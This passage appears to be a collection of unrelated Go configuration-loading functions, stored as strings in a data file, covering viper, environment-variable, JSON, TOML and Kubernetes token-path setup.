postgres,\r\n\t}\r\n}", "func loadConfig() error {\n\terr := json.Unmarshal([]byte(defaultConf), &conf)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\t// Check format version.\n\tif conf.Version != CONF_VER {\n\t\thelper.ColorLog(\"[WARN] Your conf.json is out-of-date, please update!\\n\")\n\t\thelper.ColorLog(\"[HINT] Compare bee.json under bee source code path and yours\\n\")\n\t}\n\n\t// Set variables.\n\tif len(conf.DirStruct.Controllers) == 0 {\n\t\tconf.DirStruct.Controllers = \"controllers\"\n\t}\n\tif len(conf.DirStruct.Models) == 0 {\n\t\tconf.DirStruct.Models = \"models\"\n\t}\n\n\t// Append watch exts.\n\twatchExts = append(watchExts, conf.WatchExt...)\n\treturn nil\n}", "func Load() (*Config, error) {\n\tcfg := &Config{}\n\terr := envconfig.Process(\"\", cfg)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tif cfg.TranslationsPath == \"\" {\n\t\tv, err := promtParameter(\"TRANSLATIONS_PATH\", true)\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\n\t\tcfg.TranslationsPath = v\n\t}\n\n\tif cfg.TargetAPIAuthorizationKey == \"\" {\n\t\tv, err := promtParameter(\"TARGET_API_AUTHORIZATION_KEY\", true)\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\tcfg.TargetAPIAuthorizationKey = v\n\t}\n\n\tif cfg.TargetAPIHost == \"\" {\n\t\tv, err := promtParameter(\"TARGET_API_HOST\", true)\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\tcfg.TargetAPIHost = v\n\t}\n\n\tif cfg.OrgIDSNCF == \"\" {\n\t\tv, err := promtParameter(\"ORGID_SNCF\", false)\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\tif v == \"\" {\n\t\t\tfmt.Println(fmt.Sprintf(\"Note! Translations won't be uploaded for SNCF\"))\n\t\t}\n\n\t\tcfg.OrgIDSNCF = v\n\t}\n\n\tif cfg.OrgIDThalys == \"\" {\n\t\tv, err := promtParameter(\"ORGID_THALYS\", false)\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\tif v == \"\" {\n\t\t\tfmt.Println(fmt.Sprintf(\"Note! Translations won't be uploaded for THALYS\"))\n\t\t}\n\n\t\tcfg.OrgIDThalys = v\n\t}\n\n\treturn cfg, nil\n}", "func Load() (config *Config, err error) {\n\tconfig = &Config{}\n\n\tif err = env.Set(config); err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn\n}", "func (config *Config) Load() error {\n\tvar env string\n\tflag.StringVar(&env, \"env\", \"dev\", \"environment\")\n\n\tflag.Parse()\n\n\tviperRegistry := viper.New()\n\tviperRegistry.AddConfigPath(\"./config\")\n\tviperRegistry.SetConfigName(env)\n\tviperRegistry.SetConfigType(\"json\")\n\tviperRegistry.SetEnvPrefix(\"todo\")\n\tviperRegistry.AutomaticEnv()\n\n\tconfig.Env = env\n\n\tif err := viperRegistry.ReadInConfig(); err != nil {\n\t\treturn err\n\t}\n\n\tif err := config.configureApplication(viperRegistry); err != nil {\n\t\treturn err\n\t}\n\n\tif err := config.configureDB(viperRegistry); err != nil {\n\t\treturn err\n\t}\n\n\tif err := config.configureAuth(viperRegistry); err != nil {\n\t\treturn err\n\t}\n\n\treturn nil\n}", "func loadConfig() Config {\n\tvar args struct {\n\t\tConfigfile string `arg:\"positional\" help:\"the name of the .toml config file to load\"`\n\t\tNoCheck bool `help:\"set this to disable checking that envvar substitutions are fully resolved\"`\n\t}\n\targ.MustParse(&args)\n\n\tvar cfg Config\n\tvar err error\n\tif args.Configfile != \"\" {\n\t\tcfg, err = Load(args.Configfile, args.NoCheck)\n\t\tif err != nil {\n\t\t\tfmt.Printf(\"%s\\n\", err)\n\t\t\tos.Exit(1)\n\t\t}\n\t\treturn cfg\n\t}\n\tfmt.Println(\"a config file name is required!\")\n\tos.Exit(1)\n\treturn cfg\n}", "func Load() error {\n\tfile, err := os.Open(\".env/config.json\")\n\tdefer file.Close()\n\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tparser := json.NewDecoder(file)\n\terr = parser.Decode(&config)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tif len(config.Backend.MongoDB.URI) < 1 {\n\t\tconfig.Backend.MongoDB.URI = \"mongodb://127.0.0.1:27017\"\n\t}\n\n\tif len(config.Backend.MongoDB.Database) < 1 {\n\t\tconfig.Backend.MongoDB.Database = \"ikuta\"\n\t}\n\n\tif len(config.HTTP.Address) < 1 {\n\t\tconfig.HTTP.Address = \":7136\"\n\t}\n\n\treturn nil\n}", "func LoadConfig(filename string) *revel.MergedConfig {\n\tif *searchPath != \"\" {\n\t\tAddSearchPath(*searchPath)\n\t\t*searchPath = \"\"\n\t}\n\n\tc, err := loadPriorConfig(filename)\n\tif err != nil {\n\t\trevel.ERROR.Printf(\"error load config: %s\", err.Error())\n\t\trevel.ERROR.Printf(\"filename: %s, runmode: %s, path: %s\", filename, revel.RunMode, revel.ConfPaths)\n\t}\n\treturn c\n}", "func LoadConfig(params map[string]string) *Config {\n\treturn &Config{params[\"githubToken\"], params[\"githubGistID\"], params[\"githubGistFileName\"]}\n}", "func LoadConfig(args []string) (configData *ConfigData) {\n\t//default\n\tdefaultConfig := GetDefaultConfig()\n\t_configData = defaultConfig\n\t//http.conf\n\tfileConfig, _ := ParseConfigFromFile(CONFIGFILE)\n\n\t//-c,not use http.conf\n\n\t//Print config\n}", "func LoadConfig(path string) (config Config, err error) {\n\tviper.AddConfigPath(path)\n\tviper.SetConfigName(\"app\") // since app.env\n\tviper.SetConfigType(\"env\") // json-xml etx could have been also be used\n\n\tviper.AutomaticEnv()\n\t// automatically override values from config file with the values of the env vars\n\n\t// start reading\n\terr = viper.ReadInConfig()\n\tif err != nil {\n\t\treturn\n\t}\n\n\t// unmarshal the values to target config object\n\terr = viper.Unmarshal(&config)\n\treturn\n}", "func loadConfig() (config Config) {\n var set bool\n if config.DockerSock, set = os.LookupEnv(\"DOCKER_SOCK\"); !set {\n config.DockerSock = \"/var/run/docker.sock\"\n }\n if config.VaultAddr, set = os.LookupEnv(\"VAULT_ADDR\"); !set {\n config.VaultAddr = \"http://127.0.0.1:8200\"\n }\n config.VaultSalt, _ = os.LookupEnv(\"VAULT_SALT\")\n return\n}", "func Load(r io.Reader, config interface{}, logFunc func(args ...interface{})) error {\n\tif logFunc == nil {\n\t\tlogFunc = log.Println\n\t}\n\n\tconfigBytes, err := ioutil.ReadAll(r)\n\tif err != nil {\n\t\tlogFunc(\"ERROR reading from source\", err)\n\t\treturn err\n\t}\n\tlogFunc(\"CONFIG: \", string(configBytes))\n\n\ttpl := template.Must(template.New(\"config\").Parse(string(configBytes)))\n\n\t//pass env to config\n\tvar b bytes.Buffer\n\terr = tpl.Execute(&b, getEnv())\n\tif err != nil {\n\t\tlogFunc(\"ERROR in compiling the template. Check http://golang.org/pkg/text/template/ for the template format\", err)\n\t\treturn err\n\t}\n\n\tkt := reflect.TypeOf(\"\")\n\tvt := reflect.TypeOf(config)\n\tm := reflect.MakeMap(reflect.MapOf(kt, vt))\n\n\tconfigData := m.Interface()\n\n\terr = yaml.Unmarshal(b.Bytes(), configData)\n\tif err != nil {\n\t\tlogFunc(\"ERROR in parsing YAML\", err)\n\t\treturn err\n\t}\n\n\tc := m.MapIndex(reflect.ValueOf(GOENV))\n\n\tcptr := reflect.ValueOf(config)\n\n\tel := cptr.Elem()\n\n\tif !el.CanSet() {\n\t\terr = errors.New(\"ERROR: the config variable should be a pointer\")\n\t\tlogFunc(err)\n\t\treturn err\n\t}\n\n\tel.Set(c.Elem())\n\treturn nil\n}", "func loadConfig() {\n\terr := godotenv.Load()\n\n\tif err != nil {\n\t\tlog.Println(\"did not load any .env file\")\n\t}\n\n\terr = env.Parse(&cfg)\n\n\tif err != nil {\n\t\tlog.Fatal(\"The .env format is not valid\", err)\n\t}\n}", "func (kr *KRun) LoadConfig() *KRun {\n\n\tif kr.KSA == \"\" {\n\t\t// Same environment used for VMs\n\t\tkr.KSA = os.Getenv(\"WORKLOAD_SERVICE_ACCOUNT\")\n\t}\n\tif kr.KSA == \"\" {\n\t\tkr.KSA = \"default\"\n\t}\n\n\tif kr.Namespace == \"\" {\n\t\t// Same environment used for VMs\n\t\tkr.Namespace = os.Getenv(\"WORKLOAD_NAMESPACE\")\n\t}\n\tif kr.Name == \"\" {\n\t\tkr.Name = os.Getenv(\"WORKLOAD_NAME\")\n\t}\n\tif kr.Gateway == \"\" {\n\t\tkr.Gateway = os.Getenv(\"GATEWAY_NAME\")\n\t}\n\n\tks := os.Getenv(\"K_SERVICE\")\n\tif kr.Namespace == \"\" {\n\t\tverNsName := strings.SplitN(ks, \"--\", 2)\n\t\tif len(verNsName) > 1 {\n\t\t\tks = verNsName[1]\n\t\t\tkr.Labels[\"ver\"] = verNsName[0]\n\t\t}\n\t\tparts := strings.Split(ks, \"-\")\n\t\tkr.Namespace = parts[0]\n\t\tif len(parts) > 1 {\n\t\t\tkr.Name = parts[1]\n\t\t}\n\t}\n\n\tif kr.Namespace == \"\" {\n\t\tkr.Namespace = \"default\"\n\t}\n\tif kr.Name == \"\" {\n\t\tkr.Name = kr.Namespace\n\t}\n\n\tkr.Aud2File = map[string]string{}\n\tprefix := \".\"\n\tif os.Getuid() == 0 {\n\t\tprefix = \"\"\n\t}\n\tif kr.BaseDir == \"\" {\n\t\tkr.BaseDir = os.Getenv(\"MESH_BASE_DIR\")\n\t}\n\tif kr.BaseDir != \"\" {\n\t\tprefix = kr.BaseDir\n\t}\n\tfor _, kv := range os.Environ() {\n\t\tkvl := strings.SplitN(kv, \"=\", 2)\n\t\tif strings.HasPrefix(kvl[0], \"K8S_SECRET_\") {\n\t\t\tkr.Secrets2Dirs[kvl[0][11:]] = prefix + kvl[1]\n\t\t}\n\t\tif strings.HasPrefix(kvl[0], \"K8S_CM_\") {\n\t\t\tkr.CM2Dirs[kvl[0][7:]] = prefix + kvl[1]\n\t\t}\n\t\tif strings.HasPrefix(kvl[0], \"K8S_TOKEN_\") {\n\t\t\tkr.Aud2File[kvl[0][10:]] = prefix + kvl[1]\n\t\t}\n\t\tif strings.HasPrefix(kvl[0], \"LABEL_\") {\n\t\t\tkr.Labels[kvl[0][6:]] = prefix + kvl[1]\n\t\t}\n\t}\n\n\tif kr.TrustDomain == \"\" {\n\t\tkr.TrustDomain = os.Getenv(\"TRUST_DOMAIN\")\n\t}\n\tif kr.TrustDomain == \"\" {\n\t\tkr.TrustDomain = kr.ProjectId + \".svc.id.goog\"\n\t}\n\tkr.Aud2File[kr.TrustDomain] = prefix + \"/var/run/secrets/tokens/istio-token\"\n\tif !kr.InCluster {\n\t\tkr.Aud2File[\"api\"] = prefix + \"/var/run/secrets/kubernetes.io/serviceaccount/token\"\n\t}\n\tif kr.KSA == \"\" {\n\t\tkr.KSA = \"default\"\n\t}\n\n\tif kr.XDSAddr == \"\" {\n\t\tkr.XDSAddr = os.Getenv(\"XDS_ADDR\")\n\t}\n\t// Advanced options\n\n\t// example dns:debug\n\tkr.AgentDebug = cfg(\"XDS_AGENT_DEBUG\", \"\")\n\n\treturn kr\n}", "func Load(config interface{}, filename string) error {\n\tv := reflect.ValueOf(config).Elem()\n\tif err := applyDefaults(reflect.StructField{}, v); err != nil {\n\t\treturn fmt.Errorf(\"init config with default values: %s\", err)\n\t}\n\n\tif err := mergeJSONConfig(config, filename); err != nil {\n\t\treturn err\n\t}\n\n\tif err := applyEnv(config); err != nil {\n\t\treturn err\n\t}\n\n\treturn validate(config)\n}", "func (f *Frontend) Loadconfig() error {\n\tcfgFile := configFile()\n\tcfgExists, err := exists(cfgFile)\n\tif err != nil {\n\t\treturn err\n\t}\n\tif !cfgExists {\n\t\treturn fmt.Errorf(configNotFound)\n\t}\n\tbs, err := ioutil.ReadFile(cfgFile)\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = json.Unmarshal(bs, f.Config)\n\tif err != nil {\n\t\treturn err\n\t}\n\tf.storage.Config = f.Config\n\tf.loader.Config = f.Config\n\treturn err\n}", "func (kr *KRun) LoadConfig(ctx context.Context) error {\n\terr := kr.K8SClient(ctx)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\t// Load additional settings from env.\n\tkr.initFromEnv()\n\n\t// It is possible to have only one of the 2 mesh connector services installed\n\tif kr.XDSAddr == \"\" || kr.ProjectNumber == \"\" ||\n\t\t(kr.MeshConnectorAddr == \"\" && kr.MeshConnectorInternalAddr == \"\") {\n\t\terr := kr.loadMeshEnv(ctx)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t}\n\n\treturn err\n}", "func loadConfig(configName string, configType string) error {\n\tviper.SetConfigName(configName)\n\tviper.SetConfigType(configType)\n\n\terr := viper.ReadInConfig()\n\tif err != nil {\n\t\treturn fmt.Errorf(\"cannot read configuration file: %s\\n\", err)\n\t}\n\n\treturn nil\n}", "func (c *Config) Load() error {\n\tif err := env.Parse(c); err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func loadConfig() (*provider.Config, error) {\n\t// Gets the config file path.\n\tpath := os.Getenv(configFile)\n\tif path == \"\" {\n\t\tpath = defaultConfigFilePath\n\t}\n\n\tlogger.WithField(\"filename\", path).Info(\"Parsing config file\")\n\n\t// Reads config file.\n\tdata, err := ioutil.ReadFile(path)\n\tif err != nil {\n\t\treturn nil, errors.Annotate(err, \"cannot read config file\")\n\t}\n\n\tvar c *provider.Config\n\n\t// Unmarshals the read bytes.\n\tif err = yaml.Unmarshal(data, &c); err != nil {\n\t\treturn nil, errors.Annotate(err, \"cannot unmarshal config file\")\n\t}\n\n\tc.Label = strings.ToLower(c.Label)\n\n\treturn c, nil\n}", "func (clbCfg *CLBConfig) LoadFromEnv() error {\n\tvar err error\n\tclbCfg.ImplementMode = os.Getenv(ConfigBcsClbImplement)\n\tif clbCfg.ImplementMode != ConfigBcsClbImplementAPI &&\n\t\tclbCfg.ImplementMode != ConfigBcsClbImplementSDK {\n\t\tblog.Errorf(\"implement type [%s] from env %s is invalid\", clbCfg.BackendMode, ConfigBcsClbImplement)\n\t\treturn fmt.Errorf(\"backend type [%s] from env %s is invalid\", clbCfg.BackendMode, ConfigBcsClbImplement)\n\t}\n\tclbCfg.BackendMode = os.Getenv(ConfigBcsClbBackendMode)\n\tif clbCfg.BackendMode != ConfigBcsClbBackendModeENI &&\n\t\tclbCfg.BackendMode != ConfigBcsClbBackendModeCVM {\n\t\tblog.Errorf(\"backend type [%s] from env %s is invalid\", clbCfg.BackendMode, ConfigBcsClbBackendMode)\n\t\treturn fmt.Errorf(\"backend type [%s] from env %s is invalid\", clbCfg.BackendMode, ConfigBcsClbBackendMode)\n\t}\n\tclbCfg.Region = os.Getenv(ConfigBcsClbRegion)\n\tif !CheckRegion(clbCfg.Region) {\n\t\tblog.Errorf(\"region [%s] is invalid\", clbCfg.Region)\n\t\treturn fmt.Errorf(\"region [%s] is invalid\", clbCfg.Region)\n\t}\n\tclbCfg.SecretID = os.Getenv(ConfigBcsClbSecretID)\n\tif len(clbCfg.SecretID) == 0 {\n\t\tblog.Errorf(\"secret id cannot be empty\")\n\t\treturn fmt.Errorf(\"secret id cannot be empty\")\n\t}\n\tclbCfg.SecretKey = os.Getenv(ConfigBcsClbSecretKey)\n\tif len(clbCfg.SecretKey) == 0 {\n\t\tblog.Errorf(\"secret key cannot be empty\")\n\t\treturn fmt.Errorf(\"secret key cannot be empty\")\n\t}\n\n\tprojectID := os.Getenv(ConfigBcsClbProjectID)\n\tif len(projectID) == 0 {\n\t\tblog.Errorf(\"project id cannot be empty\")\n\t\treturn fmt.Errorf(\"project id cannot be empty\")\n\t}\n\tclbCfg.ProjectID, err = strconv.Atoi(projectID)\n\tif err != nil {\n\t\tblog.Errorf(\"convert project id %s to int failed, err %s\", projectID, err.Error())\n\t\treturn fmt.Errorf(\"convert project id %s to int failed, err %s\", projectID, err.Error())\n\t}\n\tclbCfg.VpcID = os.Getenv(ConfigBcsClbVpcID)\n\tif len(clbCfg.VpcID) == 0 {\n\t\tblog.Errorf(\"vpc id cannot be empty\")\n\t\treturn fmt.Errorf(\"vpc id cannot be empty\")\n\t}\n\n\t//load expire time\n\texpireTime := os.Getenv(ConfigBcsClbExpireTime)\n\tif len(expireTime) != 0 {\n\t\teTime, err := strconv.Atoi(expireTime)\n\t\tif err != nil {\n\t\t\tblog.Errorf(\"expire time %s invalid, set default value 0\", expireTime)\n\t\t\tclbCfg.ExpireTime = 0\n\t\t} else {\n\t\t\t//expire time: range 30~3600\n\t\t\tif eTime < 30 {\n\t\t\t\tclbCfg.ExpireTime = 30\n\t\t\t} else if eTime > 3600 {\n\t\t\t\tclbCfg.ExpireTime = 3600\n\t\t\t} else {\n\t\t\t\tclbCfg.ExpireTime = eTime\n\t\t\t}\n\t\t}\n\t} else {\n\t\t//default 0: means do not set expire time\n\t\tclbCfg.ExpireTime = 0\n\t}\n\n\tclbCfg.SubnetID = os.Getenv(ConfigBcsClbSubnet)\n\tmaxTimeout := os.Getenv(ConfigBcsClbMaxTimeout)\n\tif len(maxTimeout) != 0 {\n\t\ttimeout, err := strconv.Atoi(maxTimeout)\n\t\tif err != nil {\n\t\t\tblog.Errorf(\"convert max timeout %s to int error, err %s, set default value 180\", maxTimeout, err.Error())\n\t\t\tclbCfg.MaxTimeout = DefaultClbMaxTimeout\n\t\t} else {\n\t\t\tclbCfg.MaxTimeout = timeout\n\t\t}\n\t} else {\n\t\tclbCfg.MaxTimeout = DefaultClbMaxTimeout\n\t}\n\twaitPeriodExceedLimit := os.Getenv(ConfigBcsClbWaitPeriodExceedLimit)\n\tif len(waitPeriodExceedLimit) != 0 {\n\t\tperiod, err := strconv.Atoi(waitPeriodExceedLimit)\n\t\tif err != nil {\n\t\t\tblog.Errorf(\"convert wait period exceed limit %s to int error, err %s, set default value 10\",\n\t\t\t\twaitPeriodExceedLimit, err.Error())\n\t\t\tclbCfg.WaitPeriodExceedLimit = DefaultClbWaitPeriodExceedLimit\n\t\t} else {\n\t\t\tclbCfg.WaitPeriodExceedLimit = period\n\t\t}\n\t} else {\n\t\tclbCfg.WaitPeriodExceedLimit = DefaultClbWaitPeriodExceedLimit\n\t}\n\twaitPeriodLBDealing := os.Getenv(ConfigBcsClbWaitPeriodDealing)\n\tif len(waitPeriodLBDealing) != 0 {\n\t\tperiod, err := strconv.Atoi(waitPeriodLBDealing)\n\t\tif err != nil {\n\t\t\tblog.Errorf(\"convert wait period lb dealing limit %s to int error, err %s, set default value 3\",\n\t\t\t\twaitPeriodLBDealing, err.Error())\n\t\t\tclbCfg.WaitPeriodLBDealing = DefaultClbWaitPeriodDealing\n\t\t} else {\n\t\t\tclbCfg.WaitPeriodLBDealing = period\n\t\t}\n\t} else {\n\t\tclbCfg.WaitPeriodLBDealing = DefaultClbWaitPeriodDealing\n\t}\n\n\tblog.Infof(\"load clb config successfully\\n\")\n\treturn nil\n}", "func Load(env string) *Configuration {\n\t_, filePath, _, _ := runtime.Caller(0)\n\tconfigName := \"config.\" + env + \".yaml\"\n\tconfigPath := filePath[:len(filePath)-9] + \"files\" + string(filepath.Separator)\n\n\tviper.SetConfigName(configName)\n\tviper.AddConfigPath(configPath)\n\tviper.SetConfigType(\"yaml\")\n\n\terr := viper.ReadInConfig()\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\n\tvar config Configuration\n\tviper.Unmarshal(&config)\n\tsetGinMode(config.Server.Mode)\n\n\treturn &config\n}", "func LoadConfig(filePath string, edwardVersion string) (Config, error) {\n\treader, err := os.Open(filePath)\n\tif err != nil {\n\t\treturn Config{}, errors.WithStack(err)\n\t}\n\tworkingDir := path.Dir(filePath)\n\tconfig, err := loadConfigContents(reader, workingDir)\n\tconfig.FilePath = filePath\n\tif err != nil {\n\t\treturn Config{}, errors.WithStack(err)\n\t}\n\tif config.MinEdwardVersion != \"\" && edwardVersion != \"\" {\n\t\t// Check that this config is supported by this version\n\t\tminVersion, err1 := version.NewVersion(config.MinEdwardVersion)\n\t\tif err1 != nil {\n\t\t\treturn Config{}, errors.WithStack(err)\n\t\t}\n\t\tcurrentVersion, err2 := version.NewVersion(edwardVersion)\n\t\tif err2 != nil {\n\t\t\treturn Config{}, errors.WithStack(err)\n\t\t}\n\t\tif currentVersion.LessThan(minVersion) {\n\t\t\treturn Config{}, errors.New(\"this config requires at least version \" + config.MinEdwardVersion)\n\t\t}\n\t}\n\terr = config.initMaps()\n\n\tlog.Printf(\"Config loaded with: %d groups and %d services\\n\", len(config.GroupMap), len(config.ServiceMap))\n\treturn config, errors.WithStack(err)\n}", "func LoadConfig(path string, env string) (Config, error) {\n\tvar config Config\n\tviper.AddConfigPath(path + \"/env\")\n\tviper.SetConfigName(env)\n\tviper.SetConfigType(\"env\")\n\tviper.AutomaticEnv()\n\terr := viper.ReadInConfig()\n\tif err != nil {\n\t\treturn config, err\n\t}\n\terr = viper.Unmarshal(&config)\n\treturn config, err\n}", "func loadConfiguration() Config {\n\tvar conf Config\n\t_, b, _, _ := runtime.Caller(0)\n\tbasepath := filepath.Dir(b)\n\tfilename := fmt.Sprintf(\"%s/config.json\", basepath)\n\tconfigFile, err := os.Open(filename)\n\tdefer configFile.Close()\n\tif err != nil {\n\t\tlog.Println(err.Error())\n\t}\n\tjsonParser := json.NewDecoder(configFile)\n\tjsonParser.Decode(&conf)\n\t// Use ENV var if it's set\n\tconf.Port = getEnvIntValue(\"Port\", conf.Port)\n\tconf.ReqPerSec = getEnvIntValue(\"ReqPerSec\", conf.ReqPerSec)\n\tconf.ReqPerMin = getEnvIntValue(\"ReqPerMin\", conf.ReqPerMin)\n\tconf.ReqPerHour = getEnvIntValue(\"ReqPerHour\", conf.ReqPerHour)\n\tconf.RedisHost = getEnvStrValue(\"RedisHost\", conf.RedisHost)\n\tconf.RedisPort = getEnvIntValue(\"RedisPort\", conf.RedisPort)\n\n\treturn conf\n}", "func loadConfig() error {\n\t//if path != \"\" {\n\tif defaultConfig.IsSet(\"cfgFile\") && defaultConfig.GetString(\"cfgFile\") != \"\" {\n\t\tpath := defaultConfig.GetString(\"cfgFile\")\n\t\t_, err := os.Stat(path)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\n\t\tfilename := filepath.Base(path)\n\t\tdefaultConfig.SetConfigName(filename[:len(filename)-len(filepath.Ext(filename))])\n\t\tdefaultConfig.AddConfigPath(filepath.Dir(path))\n\n\t\tif err := defaultConfig.ReadInConfig(); err != nil {\n\t\t\treturn fmt.Errorf(\"Failed to read config file (%s): %s\\n\", path, err.Error())\n\t\t}\n\t}\n\treturn nil\n}", "func (c *AppConfig) LoadConfig() {\n\tif Config.WorkPath != Config.AppPath {\n\t\tos.Chdir(Config.AppPath)\n\t}\n\n\tconfigFile := filepath.Join(Config.AppPath, \".env\")\n\tif _, err := os.Stat(configFile); os.IsNotExist(err) {\n\t\tlog.Warnf(\"No Config File Loaded, Using Default Config ...\")\n\t} else {\n\t\tgodotenv.Load(configFile)\n\t}\n}", "func loadConfig() {\n\tpath, err := tcpauseCmd.PersistentFlags().GetString(\"config\")\n\tif err != nil {\n\t\tlogger.WithError(err).Fatal(\"Could not get config path\")\n\t}\n\n\t// configure viper\n\tif path != \"\" {\n\t\tv.SetConfigFile(path)\n\t} else {\n\t\tv.SetConfigName(\"config\")\n\t\tv.AddConfigPath(\"/etc/puppetlabs/puppet-proxy\")\n\t\tv.AddConfigPath(\".\")\n\t}\n\n\t// read config\n\terr = v.ReadInConfig()\n\tif err != nil {\n\t\tlogger.WithError(err).Fatal(\"Could not read config\")\n\t}\n\n\t// parse config\n\terr = v.Unmarshal(&cfg)\n\tif err != nil {\n\t\tlogger.WithError(err).Fatal(\"Could not parse config\")\n\t}\n}", "func Load(env string) error {\n\tvar wd string\n\tvar yes bool\n\tvar err error\n\tif wd, err = os.Getwd(); err != nil {\n\t\treturn err\n\t}\n\n\tcwdConfig := filepath.Join(wd, DATA_DIR, CONFIG)\n\tif yes, err = paths.FileExists(cwdConfig); err != nil {\n\t\treturn err\n\t} else if yes {\n\t\treturn LoadFile(cwdConfig, env)\n\t}\n\n\tvar vcsRoot string\n\tif _, vcsRoot, err = paths.FindVCSRoot(wd); err != nil {\n\t\treturn err\n\t} else if len(vcsRoot) == 0 {\n\t\treturn errors.New(errVCSRoot)\n\t}\n\n\tvcsConfig := filepath.Join(vcsRoot, DATA_DIR, CONFIG)\n\tif yes, err = paths.FileExists(vcsConfig); err != nil {\n\t\treturn err\n\t} else if yes {\n\t\treturn LoadFile(vcsConfig, env)\n\t}\n\n\treturn errors.New(errConfig)\n}", "func loadConfig() *config {\n\tc := &config{}\n\tdefaults := configDefaults[Env()]\n\tconfigFile, err := loadConfigFile(os.ExpandEnv(\"$HOME/.gotrix/config.json\"))\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\n\tc.ApplicationName = configValue(\"APPLICATION_NAME\", configFile.ApplicationName, defaults.ApplicationName)\n\tc.DatabaseURL = configValue(\"DATABASE_URL\", configFile.DatabaseURL, defaults.DatabaseURL)\n\tc.Port = configValue(\"PORT\", configFile.Port, defaults.Port)\n\n\treturn c\n}", "func (appConf *AppConf) Load(filename string, forceReload bool) (*AppConf, error){\n\t// appConf is load and force reload is false return direction\n\tif isLoad && !forceReload{\n\t\treturn appConf, nil\n\t}\n\tfilename, err := appConf.getEnvConfigPath(filename)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\t_, err = toml.DecodeFile(filename, appConf)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tlog.Infof(\"使用配置文件: %s\", filename)\n\t// mark appConf as loaded\n\tisLoad = true\n\treturn appConf, nil\n}", "func (ts *Tester) LoadConfig() (eksconfig.Config, error) {\n\treturn *ts.cfg, nil\n}", "func loadConfig() Config {\n\tc := Config{}\n\n\t// if config file isn't passed in, don't try to look at it\n\tif len(os.Getenv(\"KIOSK_CONFIG_FILE\")) == 0 {\n\t\treturn c\n\t}\n\n\tfile, err := ioutil.ReadFile(os.Getenv(\"KIOSK_CONFIG_FILE\"))\n\tif err != nil {\n\t\tlog.Debugf(\"error reading in the config file: %s\", err)\n\t}\n\n\t_ = json.Unmarshal([]byte(file), &c)\n\n\t// if we still don't have an access secret let's generate a random one\n\treturn c\n}", "func loadConfig() configuration {\n\terr := godotenv.Load(\"config.env\")\n\tif err != nil {\n\t\tlog.Fatal(\"Error loading .env file\")\n\t}\n\n\tconfig := configuration{}\n\n\tconfig.cityName = os.Getenv(\"CITY_NAME\")\n\tconfig.cityLat, err = strconv.ParseFloat(os.Getenv(\"CITY_LAT\"), 64)\n\tif err != nil {\n\t\tlog.Fatal(\"CITY_LAT configuration is missing\")\n\t}\n\n\tconfig.cityLong, err = strconv.ParseFloat(os.Getenv(\"CITY_LONG\"), 64)\n\tif err != nil {\n\t\tlog.Fatal(\"CITY_LONG configuration is missing\")\n\t}\n\n\tconfig.cityTimezone, err = strconv.Atoi(os.Getenv(\"CITY_TIMEZONE\"))\n\tif err != nil {\n\t\tlog.Fatal(\"CITY_TIMEZONE configuration is missing\")\n\t}\n\n\tconfig.azanFile = os.Getenv(\"AZAN_FILENAME\")\n\tif config.azanFile == \"\" {\n\t\tlog.Fatal(\"AZAN_FILENAME configuration is missing\")\n\t}\n\n\tconfig.method = os.Getenv(\"METHOD\")\n\tif config.azanFile == \"\" {\n\t\tlog.Fatal(\"METHOD configuration is missing\")\n\t}\n\n\treturn config\n}", "func Load(configFile string) (*Config, error) {\n\t// User explicitly specified a config file\n\tif configFile != \"\" {\n\t\treturn ParseConfigFile(configFile)\n\t}\n\n\t// There is a config in the current directory\n\tif fi, err := os.Stat(defaultConfigFile); err == nil {\n\t\treturn ParseConfigFile(fi.Name())\n\t}\n\n\t// Use default values\n\tlog.Println(\"Running dev mode with default settings, consult config when you're ready to run in production\")\n\tcfg := defaultConfig()\n\treturn cfg, envOverride(cfg)\n}", "func LoadConfig(fileName string) (*model.Config, string, map[string]interface{}, *model.AppError) {\n\tvar configPath string\n\n\tif fileName != filepath.Base(fileName) {\n\t\tconfigPath = fileName\n\t} else {\n\t\tif path, err := EnsureConfigFile(fileName); err != nil {\n\t\t\tappErr := model.NewAppError(\"LoadConfig\", \"utils.config.load_config.opening.panic\", map[string]interface{}{\"Filename\": fileName, \"Error\": err.Error()}, \"\", 0)\n\t\t\treturn nil, \"\", nil, appErr\n\t\t} else {\n\t\t\tconfigPath = path\n\t\t}\n\t}\n\n\tconfig, envConfig, err := ReadConfigFile(configPath, true)\n\tif err != nil {\n\t\tappErr := model.NewAppError(\"LoadConfig\", \"utils.config.load_config.decoding.panic\", map[string]interface{}{\"Filename\": fileName, \"Error\": err.Error()}, \"\", 0)\n\t\treturn nil, \"\", nil, appErr\n\t}\n\n\tneedSave := len(config.SqlSettings.AtRestEncryptKey) == 0 || len(*config.FileSettings.PublicLinkSalt) == 0 ||\n\t\tlen(config.EmailSettings.InviteSalt) == 0\n\n\tconfig.SetDefaults()\n\n\t// Don't treat it as an error right now if custom terms of service are enabled but text is empty.\n\t// This is because terms of service text will be fetched from database at a later state, but\n\t// the flag indicating it is enabled is fetched from config file right away.\n\tif err := config.IsValid(); err != nil && err.Id != termsOfServiceEnabledAndEmpty.Id {\n\t\treturn nil, \"\", nil, err\n\t}\n\n\tif needSave {\n\t\tif err := SaveConfig(configPath, config); err != nil {\n\t\t\tmlog.Warn(err.Error())\n\t\t}\n\t}\n\n\tif err := ValidateLocales(config); err != nil {\n\t\tif err := SaveConfig(configPath, config); err != nil {\n\t\t\tmlog.Warn(err.Error())\n\t\t}\n\t}\n\n\tif *config.FileSettings.DriverName == model.IMAGE_DRIVER_LOCAL 